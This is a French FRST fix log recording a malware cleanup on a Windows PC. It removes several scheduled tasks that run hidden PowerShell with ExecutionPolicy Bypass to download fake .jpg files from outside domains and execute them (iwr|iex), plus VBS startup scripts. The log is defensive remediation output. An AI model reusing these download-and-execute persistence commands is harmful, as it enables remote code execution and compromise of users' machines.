Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 04-06-2022 01
Exécuté par BUREAU DU MAS (05-06-2022 19:36:29) Run:1
Exécuté depuis C:\Users\BUREAU DU MAS\Desktop
Profils chargés: BUREAU DU MAS
Mode d'amorçage: Normal
==============================================

fixlist contenu:
*****************
CreateRestorePoint:
CloseProcesses:
Startup: C:\Users\BUREAU DU MAS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dmlstl.VBS [2022-05-04] () [Fichier non signé]
Task: {22D33687-DB97-465E-91EE-88E87C4D7315} - System32\Tasks\Unlimited => C:\ProgramData\Unlimited\ISO\Unlimited.vbs [207 2022-05-11] () [Fichier non signé]
Task: {4196150C-7D1B-4212-B97B-72FCA87CEFA0} - System32\Tasks\Error => C:\ProgramData\Error\ISO\Error.vbs [12395 2022-06-05] () [Fichier non signé]
Task: {6D337A76-BA1D-47FC-A9F0-70128E763F11} - System32\Tasks\Turismo => powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr ""hxxps://unimed-corporated.com/tur/turismo.jpg"" -useB|iex;
Task: {CB425767-D91C-4BD6-BC96-495375A83BD4} - System32\Tasks\HomeOffice => powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr ""hxxps://unimed-corporated.com/booking.jpg"" -useB|iex;
Task: {E022830E-8C34-429E-96A0-D99407D83010} - System32\Tasks\CCleanData => powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr ""hxxps://skynetx.com.br/booking.jpg"" -useB|iex;
Task: {F8E3FA99-9FCE-45BC-BACA-0A6CD7143FCE} - System32\Tasks\AudioHD32 => powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr ""hxxps://unimed-corporated.com/booking.jpg"" -useB|iex;
Edge Extension: (Pas de nom) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [non trouvé(e)]
Edge Extension: (Pas de nom) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [non trouvé(e)]
Edge Extension: (Pas de nom) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [non trouvé(e)]
Edge Extension: (Pas de nom) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [non trouvé(e)]
CHR Notifications: Default -> hxxps://business.facebook.com; hxxps://www.aidetechniqueauto.fr; hxxps://www.epson.co.uk; hxxps://www.epson.fr; hxxps://www.legisocial.fr; hxxps://www.thaiairways.com
CHR DefaultSearchURL: Default -> hxxps://fr.search.yahoo.com/search?fr=mcafee&type=E211FR885G0&p={searchTerms}
FirewallRules: [{079473BA-C039-4215-AFFA-FB367D5C5F38}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe => Pas de fichier
FirewallRules: [{502B5D49-C7D3-434B-96D2-BD8520312154}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe => Pas de fichier
FirewallRules: [{2045AC83-7DBD-4C98-B98B-6331608C961F}] => (Allow) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe => Pas de fichier
FirewallRules: [{0635A61D-F21F-4A37-811D-1D8571E683E2}] => (Allow) C:\Users\BUREAU DU MAS\AppData\Local\Temp\EpInsNav\DL\3013\Network\EpsonNetSetup\Data\ENEasyApp.exe => Pas de fichier
FirewallRules: [{8123CDC8-3D05-4547-A7C4-8997F334712D}] => (Allow) C:\Users\BUREAU DU MAS\AppData\Local\Temp\EpInsNav\DL\3013\Network\EpsonNetSetup\Data\ENEasyApp.exe => Pas de fichier
FirewallRules: [{A197C030-5DA6-4603-B083-59004D41DB44}] => (Allow) C:\Users\BUREAU DU MAS\AppData\Roaming\Zoom\bin\airhost.exe => Pas de fichier
FirewallRules: [{3B3D98D6-F91F-421C-A020-08DA14413169}] => (Allow) C:\Users\BUREAU DU MAS\AppData\Roaming\Zoom\bin\airhost.exe => Pas de fichier
FirewallRules: [{CC5A3340-BAD1-4A8C-996B-4447948A8499}] => (Allow) C:\Users\BUREAU DU MAS\AppData\Local\Temp\RarSFX0\InstallationPackage\Install\x64\InstallGui.exe => Pas de fichier
FirewallRules: [{1B56139A-2C80-4009-A3C8-8E96815D7466}] => (Allow) C:\Users\BUREAU DU MAS\AppData\Local\Temp\RarSFX0\InstallationPackage\Install\x64\InstallGui.exe => Pas de fichier
C:\Users\BUREAU DU MAS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dmlstl.VBS
C:\ProgramData\Unlimited\ISO\Unlimited.vbs
C:\ProgramData\Error\ISO\Error.vbs
EmptyTemp:

*****************

Le Point de restauration a été créé avec succès.
Processus fermé avec succès.
C:\Users\BUREAU DU MAS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dmlstl.VBS => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{22D33687-DB97-465E-91EE-88E87C4D7315}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{22D33687-DB97-465E-91EE-88E87C4D7315}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\Unlimited => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Unlimited" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{4196150C-7D1B-4212-B97B-72FCA87CEFA0}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4196150C-7D1B-4212-B97B-72FCA87CEFA0}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\Error => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Error" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{6D337A76-BA1D-47FC-A9F0-70128E763F11}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6D337A76-BA1D-47FC-A9F0-70128E763F11}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\Turismo => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Turismo" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CB425767-D91C-4BD6-BC96-495375A83BD4}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CB425767-D91C-4BD6-BC96-495375A83BD4}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\HomeOffice => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\HomeOffice" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{E022830E-8C34-429E-96A0-D99407D83010}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E022830E-8C34-429E-96A0-D99407D83010}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\CCleanData => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\CCleanData" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{F8E3FA99-9FCE-45BC-BACA-0A6CD7143FCE}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F8E3FA99-9FCE-45BC-BACA-0A6CD7143FCE}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\AudioHD32 => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AudioHD32" => supprimé(es) avec succès
HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\Config\AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => supprimé(es) avec succès
HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\Config\BookReader_B171F20233094AC88D05A8EF7B9763E8 => supprimé(es) avec succès
HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\Config\LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => supprimé(es) avec succès
HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\Config\PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => supprimé(es) avec succès
"Chrome Notifications" => supprimé(es) avec succès
"Chrome DefaultSearchURL" => supprimé(es) avec succès
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{079473BA-C039-4215-AFFA-FB367D5C5F38}" => supprimé(es) avec succès
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{502B5D49-C7D3-434B-96D2-BD8520312154}" => supprimé(es) avec succès
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{2045AC83-7DBD-4C98-B98B-6331608C961F}" => supprimé(es) avec succès
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{0635A61D-F21F-4A37-811D-1D8571E683E2}" => supprimé(es) avec succès
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{8123CDC8-3D05-4547-A7C4-8997F334712D}" => supprimé(es) avec succès
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{A197C030-5DA6-4603-B083-59004D41DB44}" => supprimé(es) avec succès
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{3B3D98D6-F91F-421C-A020-08DA14413169}" => supprimé(es) avec succès
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{CC5A3340-BAD1-4A8C-996B-4447948A8499}" => supprimé(es) avec succès
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{1B56139A-2C80-4009-A3C8-8E96815D7466}" => supprimé(es) avec succès
"C:\Users\BUREAU DU MAS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dmlstl.VBS" => non trouvé(e)
C:\ProgramData\Unlimited\ISO\Unlimited.vbs => déplacé(es) avec succès
C:\ProgramData\Error\ISO\Error.vbs => déplacé(es) avec succès

=========== EmptyTemp: ==========

BITS transfer queue => 0 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 34151826 B
Java, Discord, Steam htmlcache => 0 B
Windows/system/drivers => 1088073 B
Edge => 193640981 B
Chrome => 1084833996 B
Firefox => 0 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 24925676 B
systemprofile32 => 24925676 B
LocalService => 27840394 B
NetworkService => 27841590 B
BUREAU DU MAS => 912911037 B

RecycleBin => 372310 B
EmptyTemp: => 2.2 GB données temporaires supprimées.

================================


Le système a dû redémarrer.

==== Fin de Fixlog 19:38:54 ====